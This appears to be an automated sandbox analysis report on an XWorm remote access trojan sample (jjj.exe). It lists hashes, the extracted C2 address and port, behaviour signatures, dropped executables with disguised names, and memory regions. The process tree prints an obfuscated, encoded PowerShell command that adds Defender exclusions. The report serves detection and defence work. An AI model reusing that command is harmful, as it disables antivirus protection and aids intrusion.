Overview

overview

10

Static

static

3

jjj.exe

windows7-x64

10

jjj.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    34s
  • max time network
    35s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    01/11/2024, 22:11

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    jjj.exe

  • Size

    773KB

  • MD5

    87a896c479974de2a6e2bea021e4ba23

  • SHA1

    67e4d876097d823c18bd06d13250e27b1645080c

  • SHA256

    fd3b7fe5e00fa4cc4f959db0c97908202a0f8054bf3aebecc57bf22f30f349ae

  • SHA512

    2f510199800543655403476360b5815ceb87f74bc60c6c51cbebd1baf25ce48254f53ce6e8f430f1981f3aef03bc371f8d177a0e9a64f01b1fb7323d0fb353e2

  • SSDEEP

    12288:iTfx1EdDy76ztuJdJHR4ih+IbwOnNeFknYhzQ0GyG4Gt1BfPnM2vDwvfxCo:W18VJqdduigIsOnNe44E0GFPz82vDgz

Score
10/10
xwormdefense_evasionrattrojan

Malware Config

Extracted

Family

xworm

C2

83.38.24.1:1603

Attributes
  • Install_directory

    %Public%

  • install_file

    WmiPrvSE.exe

Signatures

  • Detect Xworm Payload 10 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Xworm family
    xworm
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 5 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

    defense_evasion
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Suspicious behavior: EnumeratesProcesses 27 IoCs
  • Suspicious use of AdjustPrivilegeToken 11 IoCs
  • Suspicious use of FindShellTrayWindow 49 IoCs
  • Suspicious use of SendNotifyMessage 49 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\jjj.exe
    "C:\Users\Admin\AppData\Local\Temp\jjj.exe"
    1⤵
    • Checks computer location settings
    • Drops file in Windows directory
    • Suspicious use of WriteProcessMemory
    PID:4916
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGEAYQB5ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawB3ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGwAcABpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHMAcQB3ACMAPgA="
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4704
    • C:\Users\Admin\AppData\Local\Temp\svhost.exe
      "C:\Users\Admin\AppData\Local\Temp\svhost.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:1668
    • C:\Users\Admin\WmiPrvSE.exe
      "C:\Users\Admin\WmiPrvSE.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:4976
    • C:\Users\Admin\SecurityHealthSystray.exe
      "C:\Users\Admin\SecurityHealthSystray.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:4024
    • C:\Users\Admin\AppData\Local\Temp\OneDrive.exe
      "C:\Users\Admin\AppData\Local\Temp\OneDrive.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:688
    • C:\Windows\SearchFilterHost.exe
      "C:\Windows\SearchFilterHost.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:4088
  • C:\Windows\system32\taskmgr.exe
    "C:\Windows\system32\taskmgr.exe" /4
    1⤵
    • Checks SCSI registry key(s)
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    PID:4972

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\OneDrive.exe
    Filesize

    177KB

    MD5

    321e9bcf67cbbbc238c123f42a2a6e62

    SHA1

    01346677f67ae5df7df9cd2cab70fa342b3a4c32

    SHA256

    8e88ef60280096bc438183cdd0ff866e23412c319a0ce7b41ffade3f55425002

    SHA512

    c83f5ecb5e88a11853f9a2a07b39fdce3e14cc03c0366f020d74cd75aae406f9347c4a6b81e830e974fc290efdf444b30d8cf1316ee8777b4f2501ef3bcb2555

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tgblzdtr.qzl.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\svhost.exe
    Filesize

    58KB

    MD5

    9a363c5e7413fdc762f6999441cfe0d3

    SHA1

    536de532e5e06e64ecf0692da96fa704bbfaa88c

    SHA256

    5bbd989946339b7a649afc76fdc1f724880a04449ad7cf8cba2cc191384dc0f5

    SHA512

    00732d099d7a78e7010ba4beebdaa6f3a3c4439a47f52bf641f1f206d828e7f82c862c39ab6995131e841880c9c6a05f41b1cce3f476c760664534c8b46248f5

    Download Submit

  • C:\Users\Admin\SecurityHealthSystray.exe
    Filesize

    251KB

    MD5

    a7209832f2c21ce4c6e351b1f1d4749c

    SHA1

    5849477602755a1a2be4fc2a8a395dc8f523fc07

    SHA256

    b5ed60d7bda3cfe44a7397c5378ed4bce4f8a700508835a4b58169a74e355ea8

    SHA512

    912f4355fa7c64d5da527d7b7ed3389690c39a6fa89192efc5a8093d4425f00f47c2ecd182f86df720d9c3b471a34ec659235ad35780a794cfa2ebe065220ea1

    Download Submit

  • C:\Users\Admin\WmiPrvSE.exe
    Filesize

    122KB

    MD5

    7d9b4554f40cff6fd14f88a1d962aa18

    SHA1

    7e2b4a48208cb5a16ad28e28b8deff672b39f91c

    SHA256

    af1a768786ee5fbc4ee20de4d7ac56fc22b88e37382579e007b68ffba53a91a2

    SHA512

    b5d892c3f495442680f6fa10b556085b051a72a258781619442ae8f4afd483511f4b634375c62d75bb0d99d39a80f4e936360b2df4454685f74aef7305b684ba

    Download Submit

  • C:\Windows\SearchFilterHost.exe
    Filesize

    154KB

    MD5

    e83d7a2812b8b9fc0b168baef465c8ab

    SHA1

    d708a9b78001ab9e4708091e241c64dc5b3b6a9e

    SHA256

    c0666c0fad2ce0cca691b9a6b9f8bc59e8e5319e8a79961d7aa4eabba3b3cd0d

    SHA512

    b49c0d14769c4aa949329b76b92f913746949887343c6567077ddc4d40e5613c1887d76bd0fcca7bdf4b59e1fa37c3184fd897d87210e8dce6c88bab60b1484b

    Download Submit

  • memory/688-110-0x0000000000B20000-0x0000000000B52000-memory.dmp

    Filesize

    200KB

    Download

  • memory/1668-44-0x0000000000310000-0x0000000000324000-memory.dmp

    Filesize

    80KB

    Download

  • memory/1668-118-0x00007FFA71810000-0x00007FFA722D1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/1668-45-0x00007FFA71810000-0x00007FFA722D1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4024-77-0x0000000000250000-0x0000000000294000-memory.dmp

    Filesize

    272KB

    Download

  • memory/4088-112-0x00000000000D0000-0x00000000000FC000-memory.dmp

    Filesize

    176KB

    Download

  • memory/4704-111-0x00007FFA71810000-0x00007FFA722D1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4704-114-0x00007FFA71810000-0x00007FFA722D1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4704-76-0x00007FFA71810000-0x00007FFA722D1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4704-101-0x0000023CC0740000-0x0000023CC0762000-memory.dmp

    Filesize

    136KB

    Download

  • memory/4704-117-0x00007FFA71810000-0x00007FFA722D1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4916-1-0x0000000000D40000-0x0000000000E08000-memory.dmp

    Filesize

    800KB

    Download

  • memory/4916-113-0x00007FFA71810000-0x00007FFA722D1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4916-2-0x00007FFA71810000-0x00007FFA722D1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4916-0-0x00007FFA71813000-0x00007FFA71815000-memory.dmp

    Filesize

    8KB

    Download

  • memory/4972-129-0x000001F384750000-0x000001F384751000-memory.dmp

    Filesize

    4KB

    Download

  • memory/4972-119-0x000001F384750000-0x000001F384751000-memory.dmp

    Filesize

    4KB

    Download

  • memory/4972-121-0x000001F384750000-0x000001F384751000-memory.dmp

    Filesize

    4KB

    Download

  • memory/4972-120-0x000001F384750000-0x000001F384751000-memory.dmp

    Filesize

    4KB

    Download

  • memory/4972-131-0x000001F384750000-0x000001F384751000-memory.dmp

    Filesize

    4KB

    Download

  • memory/4972-130-0x000001F384750000-0x000001F384751000-memory.dmp

    Filesize

    4KB

    Download

  • memory/4972-128-0x000001F384750000-0x000001F384751000-memory.dmp

    Filesize

    4KB

    Download

  • memory/4972-127-0x000001F384750000-0x000001F384751000-memory.dmp

    Filesize

    4KB

    Download

  • memory/4972-126-0x000001F384750000-0x000001F384751000-memory.dmp

    Filesize

    4KB

    Download

  • memory/4972-125-0x000001F384750000-0x000001F384751000-memory.dmp

    Filesize

    4KB

    Download

  • memory/4976-71-0x0000000000EE0000-0x0000000000F04000-memory.dmp

    Filesize

    144KB

    Download